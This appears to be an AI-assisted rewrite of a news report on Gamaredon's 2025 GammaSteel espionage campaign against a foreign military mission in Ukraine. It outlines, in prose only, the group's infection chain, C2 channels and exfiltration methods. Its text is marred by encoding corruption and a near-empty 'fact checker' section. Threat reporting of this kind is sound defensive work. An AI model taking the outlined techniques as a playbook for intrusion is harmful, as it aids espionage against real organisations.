Listen to this Post
In recent reports, Symantec Threat Hunter researchers have highlighted the growing sophistication of the Russian-linked APT group Gamaredon, also known by various aliases such as Shuckworm, Armageddon, and Callisto. The group, notorious for its persistent targeting of Ukrainian entities since 2013, has recently broadened its scope to include a foreign military mission operating in Ukraine. Their latest campaign, which began in February 2025, leverages an updated version of the GammaSteel infostealer, with a particular focus on espionage operations against government and defense sectors.
Gamaredon Targets Ukrainian Military Mission with Updated Infostealer
The new campaign marks a significant escalation in the threat landscape, with Gamaredon deploying a more advanced iteration of the GammaSteel infostealer. The malware is being used to target key entities involved in a foreign military operation in Ukraine, underscoring the APT group’s continued interest in espionage and information gathering related to defense organizations.
Gamaredon has a well-established track record of launching cyberattacks on Ukrainian government, law enforcement, and defense agencies since its emergence in 2013. The group’s ongoing efforts to target Ukraine’s military operations illustrate their unwavering commitment to espionage, with attacks continuing well into 2025.
The latest campaign began in February 2025 and persisted throughout March, with the initial infection vector identified as a compromised removable drive. The updated GammaSteel version employed by Gamaredon is equipped with a variety of exfiltration methods, including cURL, Tor, and write.as. These methods allow for stealthy data exfiltration, with the added benefit of using widely trusted platforms to obscure the attackers’ origin.
Another critical aspect of this attack is Gamaredon’s shift in tactics. The APT group has evolved from using VBS-based malware to more advanced PowerShell-based scripts for obfuscation. This transition makes the group’s attacks harder to detect and analyze. The malware chain begins with the creation of a Windows Registry value under UserAssist, using âmshta.exeâ via âexplorer.exeâ to launch a multi-stage infection sequence.
One of the first files involved in the attack chainââNTUSER.DAT.TMContainer00000000000000000001.regtrans-msââestablishes a connection to a C2 server using URLs from platforms like Teletype, Telegram, and Telegraph. The second file continues the infection process by targeting both removable and network drives, creating shortcuts to execute âmshta.exeâ and hide its activities.
As the campaign progressed, experts detected more malicious activity on the targeted networks. A script that contacted a C2 server exfiltrated system metadata before downloading a PowerShell command. This command triggered the download of an obfuscated script, which then initiated the download of two additional PowerShell scripts. One script focused on reconnaissance tasks, such as capturing system information, screenshots, and files, while the other deployed an updated version of GammaSteel to steal specific files from the target.
What Undercode Say:
Shuckworm’s shift towards more sophisticated techniques marks a distinct phase in the evolution of this groupâs operations. Despite their relative lack of technical prowess compared to other Russian APT groups, Gamaredon has been relentless in adapting its tactics, evolving its malware to evade detection and refine its operational strategy.
The use of widely known services such as Tor and cURL reflects the group’s strategic aim to reduce the likelihood of detection by leveraging legitimate platforms to obscure the origin of their attacks. This reflects a growing trend in cyber warfare, where attackers, regardless of their skill levels, are utilizing available technologies to avoid raising suspicion. The group’s reliance on PowerShell for obfuscation and multi-stage malware deployment further demonstrates an increase in their operational sophistication.
The persistence of Gamaredonâs targeting of Ukrainian military assets and related foreign operations speaks to the geopolitical context surrounding these attacks. The ongoing conflict in Ukraine has made the country a focal point for both cyber espionage and cyber warfare, with a significant emphasis placed on military intelligence and strategic defense initiatives. By compromising foreign military missions operating within Ukraine, Gamaredon is not just targeting national entities but is also engaging in broader geopolitical espionage. This strategy could provide Russia with valuable intelligence that could influence military strategies or diplomatic relations in the region.
While Shuckworm may not possess the same technical finesse as more well-known Russian hacking groups like APT28 or APT29, its ability to carry out sustained campaigns with increasing sophistication shows how even less skilled actors can cause significant damage. This is particularly true when the target is focused on a high-value geopolitical objective, such as Ukraine’s defense capabilities. As we continue to see from this campaign, Gamaredonâs approach highlights an evolving trend: a focus on specific targets, prolonged campaigns, and a slow, steady increase in sophistication aimed at evading detection.
The groupâs adaptability is evident, with each new iteration of their malware showing enhancements designed to thwart detection mechanisms. The use of removable drives as an initial infection vectorâoften overlooked in favor of more direct network-based attacksâfurther emphasizes the group’s persistence and creative approach to finding ways into high-value systems.
Despite their lack of cutting-edge technical ability, Gamaredonâs consistency and focus are qualities that have allowed them to remain a persistent threat in Ukraine. While other Russian APT groups may be more technically advanced, Shuckworm compensates for these shortcomings by making incremental improvements to their malware, effectively evolving their tools to stay one step ahead of defenders.
In conclusion, the attack on foreign military missions in Ukraine underscores a broader strategy of cyber espionage that is unlikely to slow down anytime soon. As this conflict continues, the strategic importance of information gatheringâthrough both traditional espionage and cyber meansâwill only increase, making Shuckworm and other similar groups key players in the ongoing cyber warfare landscape.
Fact Checker Results:
1.
- The use of PowerShell, Tor, and cURL as obfuscation methods aligns with modern cyberattack trends.
- Gamaredonâs sustained targeting of Ukraine and its military entities reflects ongoing geopolitical espionage efforts amidst the conflict.
References:
Reported By: securityaffairs.com
Extra Source Hub:
https://www.facebook.com
Wikipedia
Undercode AI
Image Source:
Pexels
Undercode AI DI v2
